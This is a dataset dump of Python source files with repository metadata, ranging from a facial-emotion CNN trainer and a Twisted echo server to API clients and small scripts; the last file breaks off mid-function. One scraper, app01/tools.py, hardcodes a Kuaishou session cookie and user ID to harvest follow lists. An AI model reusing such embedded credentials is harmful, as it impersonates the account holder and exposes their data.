| column | dtype | range / classes |
|---|---|---|
| hexsha | string | lengths 40–40 |
| size | int64 | 5–2.06M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | lengths 3–248 |
| max_stars_repo_name | string | lengths 5–125 |
| max_stars_repo_head_hexsha | string | lengths 40–78 |
| max_stars_repo_licenses | list | lengths 1–10 |
| max_stars_count | int64 | 1–191k, nullable (⌀) |
| max_stars_repo_stars_event_min_datetime | string | lengths 24–24, nullable (⌀) |
| max_stars_repo_stars_event_max_datetime | string | lengths 24–24, nullable (⌀) |
| max_issues_repo_path | string | lengths 3–248 |
| max_issues_repo_name | string | lengths 5–125 |
| max_issues_repo_head_hexsha | string | lengths 40–78 |
| max_issues_repo_licenses | list | lengths 1–10 |
| max_issues_count | int64 | 1–67k, nullable (⌀) |
| max_issues_repo_issues_event_min_datetime | string | lengths 24–24, nullable (⌀) |
| max_issues_repo_issues_event_max_datetime | string | lengths 24–24, nullable (⌀) |
| max_forks_repo_path | string | lengths 3–248 |
| max_forks_repo_name | string | lengths 5–125 |
| max_forks_repo_head_hexsha | string | lengths 40–78 |
| max_forks_repo_licenses | list | lengths 1–10 |
| max_forks_count | int64 | 1–105k, nullable (⌀) |
| max_forks_repo_forks_event_min_datetime | string | lengths 24–24, nullable (⌀) |
| max_forks_repo_forks_event_max_datetime | string | lengths 24–24, nullable (⌀) |
| content | string | lengths 5–2.06M |
| avg_line_length | float64 | 1–1.02M |
| max_line_length | int64 | 3–1.03M |
| alphanum_fraction | float64 | 0–1 |
| count_classes | int64 | 0–1.6M |
| score_classes | float64 | 0–1 |
| count_generators | int64 | 0–651k |
| score_generators | float64 | 0–1 |
| count_decorators | int64 | 0–990k |
| score_decorators | float64 | 0–1 |
| count_async_functions | int64 | 0–235k |
| score_async_functions | float64 | 0–1 |
| count_documentation | int64 | 0–1.04M |
| score_documentation | float64 | 0–1 |
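Each record that follows fills these columns in order (⌀ marks nullable columns). A minimal sketch of inspecting such a dump with pandas, assuming a hypothetical `data.parquet` export of the dataset:

import pandas as pd

# Load the hypothetical parquet export and peek at a few of the columns above.
df = pd.read_parquet("data.parquet")
print(df[["max_stars_repo_name", "size", "score_documentation"]].head())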
hexsha: cdb91795db8c176b9e6d1d2b0ffc0bc2b063adbd | size: 857 | ext: py | lang: Python
repo: Luderio/Scientific-Computing-with-Python @ c7eebcc3b46b68b3d5c08ad25fb802ae9ff42f7f | path: Lessons/Chapter9Exercise1.py | licenses: ["MIT"]
stars: null | issues: null | forks: null

wordCounter = dict()
while True:
    inputFile = input('Enter a file: ')
    try:
        fileName = open(inputFile)
    except:
        fileName = 'invalid'
    if fileName == 'invalid':
        if inputFile == 'done':
            break
        else:
            print('Invalid Input')
            continue
    for lines in fileName:
        lines = lines.rstrip()
        words = lines.split()
        for wordItems in words:
            wordCounter[wordItems] = wordCounter.get(wordItems, 0) + 1
    # Find the most frequent word seen so far.
    largestWordCount = None
    largestWord = None
    for word, count in wordCounter.items():
        if largestWordCount is None or count > largestWordCount:
            largestWord = word
            largestWordCount = count
    print('Largest Word:', largestWord, 'Count:', largestWordCount)
    print(wordCounter)
    continue
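# A hypothetical session (assuming a file words.txt exists in the working
# directory): entering "words.txt" prints the most frequent word with its
# count plus the full counter; entering "done" exits the loop.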
| 25.969697 | 70 | 0.574096 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 78 | 0.091015 |
hexsha: cdb943e87aa2338b8600a2d1fc39c5fdf842f690 | size: 1,022 | ext: py | lang: Python
repo: kpanic/lymph @ 5681de5e65ee72efb96012608fc5189a48adafcd | path: iris/cli/help.py | licenses: ["Apache-2.0"]
stars: null | issues: null | forks: null

from iris.cli.base import Command, format_docstring, get_command_class
HELP = format_docstring("""
Usage: iris [options] <command> [<args>...]

Iris is the personification of the rainbow and messenger of the gods.

{COMMON_OPTIONS}

Commands:
  instance    Run a single service instance (one process).
  node        Run a node service that manages a group of processes on the same
              machine.
  request     Send a request message to some service and output the reply.
  inspect     Describe the available rpc methods of a service.
  tail        Stream the logs of one or more services.
  discover    Show available services.
  help        Display help information about iris.
""")


class HelpCommand(Command):
    """
    Usage: iris help [<command>]
    """

    short_description = 'Display help information about iris.'
    needs_config = False

    def run(self):
        name = self.args['<command>']
        if name:
            print(get_command_class(name).get_help())
        else:
            print(HELP)
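# Hypothetical invocations, assuming the `iris` console entry point is installed:
#   iris help            # prints the HELP text above
#   iris help node       # prints the node command's own help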
| 26.894737 | 77 | 0.671233 | 332 | 0.324853 | 0 | 0 | 0 | 0 | 0 | 0 | 681 | 0.666341 |
hexsha: cdb9f5699b06eaa0f164fb54a701bb1fdb951c1f | size: 3,321 | ext: py | lang: Python
path: src/Featurizers/DateTimeFeaturizerData/Tools/JsonGenerator.py | licenses: ["MIT"]
stars repo: Bhaskers-Blu-Org2/FeaturizersLibrary @ 229ae38ea233bfb02a6ff92ec3a67c1751c58005 | stars: 15 (2019-12-14T07:54:18.000Z – 2021-03-14T14:53:28.000Z)
issues/forks repo: Lisiczka27/FeaturizersLibrary @ dc7b42abd39589af0668c896666affb4abe8a622 | issues: 30 (2019-12-03T20:58:56.000Z – 2020-04-21T23:34:39.000Z) | forks: 13 (2020-01-23T00:18:47.000Z – 2021-10-04T17:46:45.000Z)

# ----------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License
# ----------------------------------------------------------------------
"""Generates JSON files based on data previously pickled"""

import lzma
import os
import pickle
import sys
import json

# Note that this isn't used directly, but is required by the pickled python content
import pandas as pd

import CommonEnvironment
from CommonEnvironment import CommandLine
from CommonEnvironment import FileSystem
from CommonEnvironment.StreamDecorator import StreamDecorator

# ----------------------------------------------------------------------
_script_fullpath = CommonEnvironment.ThisFullpath()
_script_dir, _script_name = os.path.split(_script_fullpath)
# ----------------------------------------------------------------------


@CommandLine.EntryPoint()
@CommandLine.Constraints(
    zipped_input_filename=CommandLine.FilenameTypeInfo(),
    output_stream=None,
)
def EntryPoint(
    zipped_input_filename,
    output_stream=sys.stdout,
):
    """Generates JSON files based on data previously pickled"""

    with StreamDecorator(output_stream).DoneManager(
        line_prefix="",
        prefix="\nResults: ",
        suffix="\n",
    ) as dm:
        output_dir = os.path.join(_script_dir, "..", "GeneratedCode")

        FileSystem.RemoveTree(output_dir)
        FileSystem.MakeDirs(output_dir)

        df = _holiday_data_loader(zipped_input_filename)

        # with open('holidays.json', 'w') as f:
        #     f.write(df.to_json(orient='records', lines=True))

        allCountryNames = list(set(df['countryOrRegion']))
        for countryName in allCountryNames:
            dfByCountry = df.loc[df['countryOrRegion'] == countryName]
            date = [int(x.timestamp()) for x in list(dfByCountry['date'])]
            name = list(dfByCountry['normalizeHolidayName'])
            date_dict = {"Date": date}
            name_dict = {"Holiday": name}
            out = {}
            out.update(date_dict)
            out.update(name_dict)
            jsonPath = os.path.join(output_dir, "{}.json".format(countryName))
            with open(jsonPath, 'w') as f:
                json.dump(out, f)

        return dm.result


# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
def _holiday_data_loader(_path):
    """Load holiday data as a static initializer."""
    with lzma.open(_path, "rb") as fr:
        df = pickle.loads(fr.read())

    df['countryRegionCode'] = df['countryRegionCode'] \
        .apply(lambda x: x if type(x) == str else None)
    df['isPaidTimeOff'] = df['isPaidTimeOff'] \
        .apply(lambda x: x if type(x) == bool else None)

    return df


# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
if __name__ == "__main__":
    try:
        sys.exit(CommandLine.Main())
    except KeyboardInterrupt:
        pass
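# Hypothetical invocation (CommonEnvironment builds the CLI from the EntryPoint
# signature above):
#   python JsonGenerator.py <zipped_input_filename>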
| 34.957895 | 82 | 0.504065 | 0 | 0 | 0 | 0 | 1,412 | 0.425173 | 0 | 0 | 1,356 | 0.408311 |
hexsha: cdba82790169d516d43e4d1c83b7c0a26c10e1fe | size: 7,152 | ext: py | lang: Python
repo: MahmoudSabra1/Emotion-recognition-song-recommendation @ 5cad8413b6c98cee12798334009fe8942a420527 | path: fer.py | licenses: ["MIT"]
stars: 11 (2020-11-11T14:52:05.000Z – 2022-03-11T11:37:42.000Z) | issues: 1 (2021-06-21T06:42:59.000Z) | forks: 7 (2021-01-26T03:40:12.000Z – 2021-12-20T12:24:34.000Z)

# Two lines that remove tensorflow GPU logs
# import os
# os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from keras.optimizers import Adam
from keras.models import Sequential, model_from_json
from keras.layers import Conv2D, MaxPooling2D, Dense, Flatten, Dropout, BatchNormalization, Activation
from keras.preprocessing.image import ImageDataGenerator
from sklearn import model_selection
from math import ceil


# Loads csv files and appends pixels to X and labels to y
def preprocess_data():
    data = pd.read_csv('fer2013.csv')
    labels = pd.read_csv('fer2013new.csv')

    orig_class_names = ['neutral', 'happiness', 'surprise', 'sadness', 'anger', 'disgust', 'fear', 'contempt',
                        'unknown', 'NF']

    n_samples = len(data)
    w = 48
    h = 48

    y = np.array(labels[orig_class_names])
    X = np.zeros((n_samples, w, h, 1))
    for i in range(n_samples):
        X[i] = np.fromstring(data['pixels'][i], dtype=int, sep=' ').reshape((h, w, 1))

    return X, y


def clean_data_and_normalize(X, y):
    orig_class_names = ['neutral', 'happiness', 'surprise', 'sadness', 'anger', 'disgust', 'fear', 'contempt',
                        'unknown', 'NF']

    # Using mask to remove unknown or NF images
    y_mask = y.argmax(axis=-1)
    mask = y_mask < orig_class_names.index('unknown')
    X = X[mask]
    y = y[mask]

    # Convert to probabilities between 0 and 1
    y = y[:, :-2] * 0.1

    # Add contempt to neutral and remove it
    y[:, 0] += y[:, 7]
    y = y[:, :7]

    # Normalize image vectors
    X = X / 255.0

    return X, y


def split_data(X, y):
    test_size = ceil(len(X) * 0.1)

    # Split Data
    x_train, x_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=test_size, random_state=42)
    x_train, x_val, y_train, y_val = model_selection.train_test_split(x_train, y_train, test_size=test_size,
                                                                      random_state=42)
    return x_train, y_train, x_val, y_val, x_test, y_test


def data_augmentation(x_train):
    shift = 0.1
    datagen = ImageDataGenerator(
        rotation_range=20,
        horizontal_flip=True,
        height_shift_range=shift,
        width_shift_range=shift)
    datagen.fit(x_train)

    return datagen


def show_augmented_images(datagen, x_train, y_train):
    it = datagen.flow(x_train, y_train, batch_size=1)
    plt.figure(figsize=(10, 7))
    for i in range(25):
        plt.subplot(5, 5, i + 1)
        plt.xticks([])
        plt.yticks([])
        plt.grid(False)
        plt.imshow(it.next()[0][0], cmap='gray')
        # plt.xlabel(class_names[y_train[i]])
    plt.show()


def define_model(input_shape=(48, 48, 1), classes=7):
    num_features = 64

    model = Sequential()

    # 1st stage
    model.add(Conv2D(num_features, kernel_size=(3, 3), input_shape=input_shape))
    model.add(BatchNormalization())
    model.add(Activation(activation='relu'))
    model.add(Conv2D(num_features, kernel_size=(3, 3)))
    model.add(BatchNormalization())
    model.add(Activation(activation='relu'))
    model.add(Dropout(0.5))

    # 2nd stage
    model.add(Conv2D(num_features, (3, 3), activation='relu'))
    model.add(Conv2D(num_features, (3, 3), activation='relu'))
    model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))

    # 3rd stage
    model.add(Conv2D(2 * num_features, kernel_size=(3, 3)))
    model.add(BatchNormalization())
    model.add(Activation(activation='relu'))
    model.add(Conv2D(2 * num_features, kernel_size=(3, 3)))
    model.add(BatchNormalization())
    model.add(Activation(activation='relu'))

    # 4th stage
    model.add(Conv2D(2 * num_features, (3, 3), activation='relu'))
    model.add(Conv2D(2 * num_features, (3, 3), activation='relu'))
    model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))

    # 5th stage
    model.add(Conv2D(4 * num_features, kernel_size=(3, 3)))
    model.add(BatchNormalization())
    model.add(Activation(activation='relu'))
    model.add(Conv2D(4 * num_features, kernel_size=(3, 3)))
    model.add(BatchNormalization())
    model.add(Activation(activation='relu'))

    model.add(Flatten())

    # Fully connected neural networks
    model.add(Dense(1024, activation='relu'))
    model.add(Dropout(0.2))
    model.add(Dense(1024, activation='relu'))
    model.add(Dropout(0.2))

    model.add(Dense(classes, activation='softmax'))

    return model


def plot_acc_loss(history):
    # Plot accuracy graph
    plt.plot(history.history['accuracy'], label='accuracy')
    plt.plot(history.history['val_accuracy'], label='val_accuracy')
    plt.xlabel('Epoch')
    plt.ylabel('accuracy')
    plt.ylim([0, 1.0])
    plt.legend(loc='upper left')
    plt.show()

    # Plot loss graph
    plt.plot(history.history['loss'], label='loss')
    plt.plot(history.history['val_loss'], label='val_loss')
    plt.xlabel('Epoch')
    plt.ylabel('Loss')
    # plt.ylim([0, 3.5])
    plt.legend(loc='upper right')
    plt.show()


def save_model_and_weights(model, test_acc):
    # Serialize and save model to JSON
    test_acc = int(test_acc * 10000)
    model_json = model.to_json()
    with open('Saved-Models\\model' + str(test_acc) + '.json', 'w') as json_file:
        json_file.write(model_json)

    # Serialize and save weights to JSON
    model.save_weights('Saved-Models\\model' + str(test_acc) + '.h5')
    print('Model and weights are saved in separate files.')


def load_model_and_weights(model_path, weights_path):
    # Loading JSON model
    json_file = open(model_path, 'r')
    loaded_model_json = json_file.read()
    json_file.close()
    model = model_from_json(loaded_model_json)

    # Loading weights
    model.load_weights(weights_path)
    model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
    print('Model and weights are loaded and compiled.')
    return model  # return the compiled model so callers can actually use it
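# Reloading a previously saved model for inference (hypothetical filenames,
# matching the naming scheme used by save_model_and_weights):
#   model = load_model_and_weights('Saved-Models\\model6712.json',
#                                  'Saved-Models\\model6712.h5')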
def run_model():
    fer_classes = ['neutral', 'happiness', 'surprise', 'sadness', 'anger', 'disgust', 'fear']

    X, y = preprocess_data()
    X, y = clean_data_and_normalize(X, y)
    x_train, y_train, x_val, y_val, x_test, y_test = split_data(X, y)
    datagen = data_augmentation(x_train)

    epochs = 100
    batch_size = 64

    print("X_train shape: " + str(x_train.shape))
    print("Y_train shape: " + str(y_train.shape))
    print("X_test shape: " + str(x_test.shape))
    print("Y_test shape: " + str(y_test.shape))
    print("X_val shape: " + str(x_val.shape))
    print("Y_val shape: " + str(y_val.shape))

    # Training model from scratch
    model = define_model(input_shape=x_train[0].shape, classes=len(fer_classes))
    model.summary()
    model.compile(optimizer=Adam(lr=0.0001), loss='binary_crossentropy', metrics=['accuracy'])
    history = model.fit(datagen.flow(x_train, y_train, batch_size=batch_size), epochs=epochs,
                        steps_per_epoch=len(x_train) // batch_size,
                        validation_data=(x_val, y_val), verbose=2)
    test_loss, test_acc = model.evaluate(x_test, y_test, batch_size=batch_size)

    plot_acc_loss(history)
    save_model_and_weights(model, test_acc)


run_model()
| 32.216216 | 115 | 0.65646 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,449 | 0.202601 |
hexsha: cdbc9720aa5c6f9258b24ce41fb35960b581a3f8 | size: 705 | ext: py | lang: Python
repo: Taschenbergerm/bgg_miner @ f20057ec2e85e20ad08f92514ce38c699e8c85eb | path: manual.py | licenses: ["MIT"]
stars: null | issues: null | forks: null

from pprint import pprint
import requests
from lxml import etree


def itter(tree):
    for ele in tree.iter():
        print("##########################")
        print("Tag:", ele.tag)
        print("Text:", ele.text)
        print("Attributes:", ele.attrib)
        print("##########################")


def main():
    # url = f"https://www.boardgamegeek.com/xmlapi/boardgame/174430"
    url = f"https://www.boardgamegeek.com/xmlapi2/thing"
    response = requests.get(url, params={"id": 174430, "stats": 1})
    print(response.request.url)
    print(response.status_code)
    print(response.content)
    tree = etree.fromstring(response.content)
    itter(tree)


if __name__ == "__main__":
    main()
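# The xmlapi2 `thing` endpoint answers with XML for the requested id; `itter`
# walks every element of the parsed tree and prints its tag, text, and
# attributes, which is a quick way to explore the response schema.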
| 27.115385 | 68 | 0.591489 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 213 | 0.302128 |
hexsha: cdbd2bded66eee36ec46ada4de75a010512f317b | size: 2,962 | ext: py | lang: Python
repo: gabrielcoder247/News-Highlight-v2 @ 595f4ee9739b173142d1012bdda63526818930e4 | path: app/requests.py | licenses: ["Unlicense"]
stars: null | issues: null | forks: null

import urllib.request, json
from .models import Source, Article
from . import main

# Getting Api Key
api_Key = None

# Getting the base urls
sources_base_url = None
articles_base_url = None


def configure_request(app):
    '''
    Function to acquire the api key and base urls
    '''
    global api_Key, sources_base_url, articles_base_url
    api_Key = app.config['NEWS_API_KEY']
    sources_base_url = app.config['NEWS_SOURCES_BASE_URL']
    articles_base_url = app.config['NEWS_ARTICLES_BASE_URL']


def get_sources(category):
    '''
    Function that gets the json response to our url request
    '''
    get_sources_url = sources_base_url.format(category)

    with urllib.request.urlopen(get_sources_url, data=None) as url:
        get_sources_data = url.read()
        get_sources_response = json.loads(get_sources_data)

        sources_results = None

        if get_sources_response['sources']:
            sources_results_list = get_sources_response['sources']
            sources_results = process_sources(sources_results_list)

    # print(sources_results)
    return sources_results


def process_sources(sources_results):
    '''
    Function that processes the sources results and transforms them into a list
    of Source objects.

    Args:
        sources_results: A list of dictionaries that contain source details

    Returns:
        sources_list: A list of Source objects
    '''
    sources_list = []
    for source_item in sources_results:
        id = source_item.get('id')
        name = source_item.get('name')
        description = source_item.get('description')
        url = source_item.get('url')
        category = source_item.get('category')

        source_object = Source(id, name, description, url, category)
        sources_list.append(source_object)

    return sources_list


def get_articles(source):
    '''
    Function that gets the json response to our url request
    '''
    get_articles_url = articles_base_url.format(source, api_Key)

    with urllib.request.urlopen(get_articles_url, data=None) as url:
        get_articles_data = url.read()
        get_articles_response = json.loads(get_articles_data)

        articles_results = None

        if get_articles_response['articles']:
            articles_results_list = get_articles_response['articles']
            articles_results = process_articles(articles_results_list)

    return articles_results


def process_articles(articles_results):
    '''
    Function that processes the articles results and transforms them into a list
    of Article objects.

    Args:
        articles_results: A list of dictionaries that contain article details

    Returns:
        articles_list: A list of Article objects
    '''
    articles_list = []
    for article_item in articles_results:
        name = article_item.get('name')
        author = article_item.get('author')
        title = article_item.get('title')
        description = article_item.get('description')
        url = article_item.get('url')
        urlToImage = article_item.get('urlToImage')
        publishedAt = article_item.get('publishedAt')

        if publishedAt and author and urlToImage:
            article_object = Article(name, author, title, description, url, urlToImage, publishedAt)
            articles_list.append(article_object)

    return articles_list

| 30.854167 | 85 | 0.778528 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 906 | 0.305874 |
hexsha: cdc3ceae4eb0b0fc7a29f9482fb7047dcfef58b4 | size: 727 | ext: py | lang: Python
repo: csmyth93/solo_scoring @ 6c1a32a3430058aa7d51be604dcc02d11ce85edd | path: main.py | licenses: ["MIT"]
stars: null | issues: null | forks: null

def get_names():
    names = []
    while True:
        name = input("Enter players name: ")
        if name != 'done':
            print(f'{name} added to the list of players')
            names.append(name)
            continue
        else:
            break
    return names


def get_player_scores(players):
    all_scores = {}  # collect every player's scores, not just the last loop's
    for player in players:
        scores = []
        while True:
            score = input(f"What are {player}'s final cards? ")
            if score != 'end':
                scores.append(score)
                continue
            else:
                break
        all_scores[player] = scores
    return all_scores


if __name__ == '__main__':
    players = get_names()
    print(players)
    scores = get_player_scores(players)
    print(scores)
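# A hypothetical run: names are collected until 'done' is entered, then each
# player's card values are read one per prompt until 'end'; the name list and
# the per-player score dict are printed at the end.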
| 22.71875 | 63 | 0.515818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 117 | 0.160935 |
hexsha: cdc3dc53bc12e7691159632083c1b94dc1973dac | size: 74 | ext: py | lang: Python
repo: fourTheorem/slic-slack @ cffc870c2399feff67199050460abdcb3385ef17 | path: tests/unit/conftest.py | licenses: ["Apache-2.0"]
stars: 4 (2022-01-14T15:47:55.000Z – 2022-01-14T16:15:18.000Z) | issues: null | forks: null

import os

# example.com is a reserved documentation domain, so the tests never hit a real Slack webhook.
os.environ['SLACK_WEBHOOK_URL'] = 'https://example.com/slack'
| 14.8 | 61 | 0.72973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 46 | 0.621622 |
hexsha: cdc442d6b9ce4b9876165256e71bc1dbffd0f620 | size: 760 | ext: py | lang: Python
repo: y2ghost/work @ b7f5b02db9dc0df6157bc799ddb4a1ac9d574cf3 | path: python/twisted/web_echo.py | licenses: ["MIT"]
stars: null | issues: null | forks: null

from twisted.protocols import basic
from twisted.internet import protocol, reactor


class HTTPEchoProtocol(basic.LineReceiver):
    def __init__(self):
        self.lines = []

    def lineReceived(self, line):
        self.lines.append(line.decode())
        if not line:
            self.sendResponse()

    def sendResponse(self):
        self.sendLine(b"HTTP/1.1 200 OK")
        self.sendLine(b"")
        responseBody = "You said:\r\n\r\n" + "\r\n".join(self.lines)
        data = responseBody.encode()
        self.transport.write(data)
        self.transport.loseConnection()


class HTTPEchoFactory(protocol.ServerFactory):
    def buildProtocol(self, addr):
        return HTTPEchoProtocol()


reactor.listenTCP(8000, HTTPEchoFactory())
reactor.run()
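# Manual test: run this script, then in another shell:
#   curl -v http://localhost:8000/
# The response body echoes back the request line and headers it received.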
| 27.142857 | 68 | 0.661842 | 614 | 0.807895 | 0 | 0 | 0 | 0 | 0 | 0 | 46 | 0.060526 |
hexsha: cdc5a62dbf81299334c3372e259e1e6b484185cd | size: 2,804 | ext: py | lang: Python
repo: xinxinliang/ksDjango @ 0c0f4a5842cf225e77035b716979fcf9b8d03311 | path: app01/tools.py | licenses: ["Apache-2.0"]
stars: 13 (2021-03-11T12:35:29.000Z – 2022-02-25T02:22:47.000Z) | issues: 1 (2021-11-04T03:02:10.000Z) | forks: 4 (2021-06-12T19:27:01.000Z – 2022-02-04T05:13:54.000Z)

import requests
import json
import os
import time

from app01.models import UserTitle

# Crawl the ids and names of the users followed on a profile page
URL = "https://video.kuaishou.com/graphql"

headers = {
    "accept": "*/*",
    "Content-Length": "<calculated when request is sent>",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "keep-alive",
    "content-type": "application/json",
    "Cookie": r'kpf=PC_WEB; kpn=KUAISHOU_VISION; clientid=3; did=web_ec874916e390b9741609686125a0452e; didv=1613879531823; client_key=65890b29; ktrace-context=1|MS43NjQ1ODM2OTgyODY2OTgyLjc1MjgyMjUyLjE2MTU0NDI5NDQ0MzYuMTU2OTE=|MS43NjQ1ODM2OTgyODY2OTgyLjIxMjcxODY4LjE2MTU0NDI5NDQ0MzYuMTU2OTI=|0|graphql-server|webservice|false|NA; userId=427400950; kuaishou.server.web_st=ChZrdWFpc2hvdS5zZXJ2ZXIud2ViLnN0EqABUkHhV7V4kZgEsKH5ujlHNWEHV_KRDoBGhvSztjMMB54VfcpY6EJgzK_b3ZYFhM0obMSTVBDc7Csb-KuDKQpR8sobH5ozd82kEMIV5eb3S0QSJBxAemnSYimqR5IskD_IGA06cph50uA_oH2OftW2tSpaBuXl3vyYhFv6aS_24d8z0n9WILEo5JcTI0QpDdmDoRnXxHc_x7JHIR3s1pBlBhoSzFZBnBL4suA5hQVn0dPKLsMxIiDp66EsPPenAZG6MBgmJkQL2mrCKEDn1OPcTisxS6wffSgFMAE; kuaishou.server.web_ph=cb43dea88ab3a4c31dd231f2dc9cc29b8680',
    "Host": "video.kuaishou.com",
    "Origin": "https://video.kuaishou.com",
    "Referer": "https://video.kuaishou.com/profile/3xsms2z7ft9fmhg",
    "User-Agent": "PostmanRuntime/7.26.8"
}

payload = {"operationName":"visionProfileUserList","variables":{"ftype":1},"query":"query visionProfileUserList($pcursor: String, $ftype: Int) {\n  visionProfileUserList(pcursor: $pcursor, ftype: $ftype) {\n    result\n    fols {\n      user_name\n      headurl\n      user_text\n      isFollowing\n      user_id\n      __typename\n    }\n    hostName\n    pcursor\n    __typename\n  }\n}\n"}


def get_data():
    res = requests.post(URL, headers=headers, json=payload)
    res.encoding = "utf-8"
    m_json = res.json()  # dict format
    fols_list = m_json["data"]["visionProfileUserList"]["fols"]
    pcursor = m_json["data"]["visionProfileUserList"]["pcursor"]
    payload["variables"]["pcursor"] = pcursor
    for fols in fols_list:
        userID = fols["user_id"]
        userName = fols["user_name"]
        # Send the data to the database
        add_data(userID, userName)
        # A delay needs to be set between requests
        time.sleep(1)
        print("userID:%s-------userName:%s" % (userID, userName))
    if pcursor == "no_more":
        return 0
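# Each response carries a `pcursor`; writing it back into `payload` makes the
# next get_data() call fetch the following page of the follow list, until the
# API answers "no_more".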
def add_data(userID, userName):
    if not UserTitle.objects.filter(userID=userID):
        UserTitle.objects.create(userID=userID, userName=userName)
        print("User with ID %s stored in the database successfully ++++++++++++++" % (userID))
    else:
        print("User with ID %s already exists in the database ---------------" % (userID))


def start_data():
    while (1):
        temp = get_data()
        if temp == 0:
            break
    print("--------------------- Current user's follow list finished -------------------")


if __name__ == "__main__":
    start_data()

| 43.8125 | 760 | 0.696148 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,928 | 0.657572 |
hexsha: cdc5fa09b3e8bd5d035d3ebb8b21feb4b7b64279 | size: 2,183 | ext: py | lang: Python
repo: jshuhnow/OddEyeCam @ ed76cd1c29701b7b49f20bcd61e7e72d3140fda8 | path: core/thirdparty/load_openpose.py | licenses: ["MIT"]
stars: 8 (2020-10-08T13:32:33.000Z – 2021-12-08T10:59:03.000Z) | issues: null | forks: 1 (2021-04-15T23:50:13.000Z)

import os
import sys

this_dir = os.path.dirname(__file__)

import numpy as np

openpose_path = os.path.join(this_dir, 'openpose')
op_release_path = os.path.join(openpose_path, 'Release')
model_path = os.path.join(openpose_path, 'models')
print(op_release_path)
sys.path.append(op_release_path)
os.environ['PATH'] = os.environ['PATH'] + ';' + openpose_path + '/x64/Release;' + openpose_path + '/bin;'
import pyopenpose as op

opWrapper = op.WrapperPython()
params = dict()
params["model_folder"] = model_path
params["number_people_max"] = 1
params["net_resolution"] = "-1x160"
params["body"] = 1
params["output_resolution"] = "-1x-1"
params["disable_multi_thread"] = True
opWrapper.configure(params)
opWrapper.start()
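# The wrapper is configured and started once at import time; the PoseEstimator
# methods below all reuse this single shared OpenPose instance.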
class PoseEstimator():
    def __init__(self):
        self.RShColor = (0, 140, 255)
        self.LShColor = (0, 255, 215)
        self.NeckColor = (0, 0, 215)
        self.NoseColor = (215, 0, 215)

    def _keypoint_to_index(self, keypoints):
        v = keypoints[:, 1]
        u = keypoints[:, 0]
        idx = np.array([v, u]).astype(np.int).transpose()
        return idx

    def find_body_on_2D(self, src_img, verts):
        datum = op.Datum()
        datum.cvInputData = src_img
        opWrapper.emplaceAndPop([datum])
        self.op_img = datum.cvOutputData
        # print(datum.poseKeypoints)

        # Check validity
        if not str(datum.poseKeypoints.shape) == '(1, 25, 3)':
            return np.zeros((25, 3)).astype(np.int)

        data = datum.poseKeypoints
        # self.RShoulder2D = np.array([data[0,2,0], data[0,2,1]])
        # self.LShoulder2D = np.array([data[0,5,0], data[0,5,1]])
        # self.Neck2D = np.array([data[0,1,0], data[0,1,1]])
        # keypoint = np.array([self.RShoulder2D, self.LShoulder2D, self.Neck2D]).astype(np.int)
        # return keypoint

        keypoints = data[0]
        # switch (u,v) -> (v,u)
        idx = self._keypoint_to_index(keypoints)
        return idx

    def just_find_body_on_2D(self, src_img):
        datum = op.Datum()
        datum.cvInputData = src_img
        opWrapper.emplaceAndPop([datum])
        self.op_img = datum.cvOutputData
        return datum.cvOutputData, datum.poseKeypoints

| 35.209677 | 107 | 0.639487 | 1,466 | 0.671553 | 0 | 0 | 0 | 0 | 0 | 0 | 523 | 0.239579 |
hexsha: cdc633f283f26d40a91533035d25cbe1abaa2d61 | size: 11,193 | ext: py | lang: Python
repo: pentschev/pybench @ 89d65a6c418a1fee39d447bd11b8a999835b74a9 | path: pybench/benchmarks/benchmark_ml.py | licenses: ["Apache-2.0"]
stars: 14 (2019-06-29T19:19:10.000Z – 2022-03-31T06:40:33.000Z) | issues: 2 (2019-07-23T22:06:37.000Z – 2019-08-19T22:15:32.000Z) | forks: 5 (2019-07-23T14:48:48.000Z – 2020-04-01T08:43:00.000Z)

import pytest
import importlib
import numba, numba.cuda
import numpy as np

from pybench import run_benchmark

_shapes = {
    "small": [(int(2 ** 14), 512), (int(2 ** 15), 512), (int(2 ** 16), 512)],
    "large": [(int(2 ** 20), 512), (int(2 ** 21), 512), (int(2 ** 22), 512)],
}


def load_data(nrows, ncols, cached, train_split=1.0, label_col=None):
    import gzip
    import os
    import numpy as np
    import pandas as pd

    train_rows = int(nrows * train_split)

    if os.path.exists(cached):
        with gzip.open(cached) as f:
            X = np.load(f)

        if train_split < 1.0 and label_col is not None:
            X = X[:, [i for i in range(X.shape[1]) if i != label_col]]
            y = X[:, label_col : label_col + 1]
            rindices = np.random.randint(0, X.shape[0] - 1, nrows)
            X = X[rindices, :ncols]
            y = y[rindices]
            df_y_train = pd.DataFrame(
                {"fea%d" % i: y[0:train_rows, i] for i in range(y.shape[1])}
            )
            df_y_test = pd.DataFrame(
                {"fea%d" % i: y[train_rows:, i] for i in range(y.shape[1])}
            )
        else:
            X = X[np.random.randint(0, X.shape[0] - 1, nrows), :ncols]
    else:
        # throws FileNotFoundError if the mortgage dataset is not present
        raise FileNotFoundError(
            "Please download the required dataset or check the path"
        )

    if train_split < 1.0 and label_col is not None:
        df_X_train = pd.DataFrame(
            {"fea%d" % i: X[0:train_rows, i] for i in range(X.shape[1])}
        )
        df_X_test = pd.DataFrame(
            {"fea%d" % i: X[train_rows:, i] for i in range(X.shape[1])}
        )
        return {
            "X_train": df_X_train,
            "X_test": df_X_test,
            "y_train": df_y_train,
            "y_test": df_y_test,
        }
    else:
        df = pd.DataFrame({"fea%d" % i: X[:, i] for i in range(X.shape[1])})
        return df


def load_mortgage(d):
